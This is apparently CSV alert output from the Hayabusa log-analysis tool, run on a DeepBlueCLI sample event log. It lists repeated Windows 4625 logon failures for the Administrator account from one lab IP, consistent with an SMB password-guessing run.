2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WR9gJBoN1ra4NI2M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rGYNVrDBIpMBu9GT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 57qCysbeaXx12CbY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyJl4mHvgtTv53d9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGBDZCtot2ogcKIO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bBhmbqZIi1gX62mM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o7d4bcBJV1jlRgdt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtfFb6hMHJiFXxai  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: frlsZMDcdb5WaW99  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CFV8UiUTRCCfab9l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZI8P6ZeVRmQlbGtz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UmJI7S1nj5hfWZqv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: veh8XInSzXe8E9UD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a1BuBHLILZ4afwJC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NN2h7CHnGSCQZXan  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BU3fxfM1qGBJ55HS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1OlBmhUABabDQbN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6DgQtHG7cT05kRXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUTe3JqVWgDcDcOS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nGKgUOyX3USQlESB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rcIJ8keQvgax1SuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A7jsyA7bWtVf4sLr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mijnM28fwbgWzkvp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6dNmJo7vkacqxA6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FxvD2OWtadDT1Q2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WK8Esc50KVWIsLU5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U07NeCzXSdx5Nlgs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tObVl72GJse2HCGp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nbEnp2E5a3N78OBC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IlRmyinJLWwj5yQg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 92H7tdXinUOxtOLV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Za42EUNuitIXaMBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kz7OtswOreS0fdeS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VMxY1IHx5VuvskM7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d6uxMqLCcqHkuesV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TmeAWYvFEbqJp1rt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8tGAdT1CBRYRatVA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0h9ulMPWtj8bEKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eLyLMNv6cOp3sgrq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIAOs16X8nFxV45x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z4EbyEaUxUEyuiY6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SDnW5GABBLbe6eZ7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GublgQLD3RXQNmkX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BQRppHTUHAoWPe4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gnh6HFlIW1zWEBu5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ulbcy5PWLYUm5Sy0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L8rkZ7iBMam5o8VJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n39Zox0PFeNirzyT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3u3YUCKxEo5pnKJX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wen3pHM88kSRkHNf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dGDHJ4KMm2zEMV0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lKZAB1nfXPYSLxsE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tYkOsX0XDpkdvp01  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r9y7HjOeGPcrdj1c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RLwh8Lg3nvbm8Q2p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QoMkBcp8ouIgpX4m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2UnrDiOAOec5DQGQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UxJGLShj5EDKLSDZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iWhaz8W0VLQdXKWN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 82YDxSIBnCAqdK4c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 795b7XqsxokIGJyM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1BmnyTsmP2XqMzf1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NB3xsYe3RcPXhDib  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxN9i8exdO2h4oa7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vjcQaeuo4f8wFXhv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zCzr77BhliB4KKeb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z558005RepKaO1zZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HFzW25mJz4JLkv7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y7J8m97GQWt2cbSs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJrVwcpABBaZ8cyY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VcDw3I4BaFLdIeCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: egEpV9aAuCFjwx2I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: th0ZLWF4YeOaNnkK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
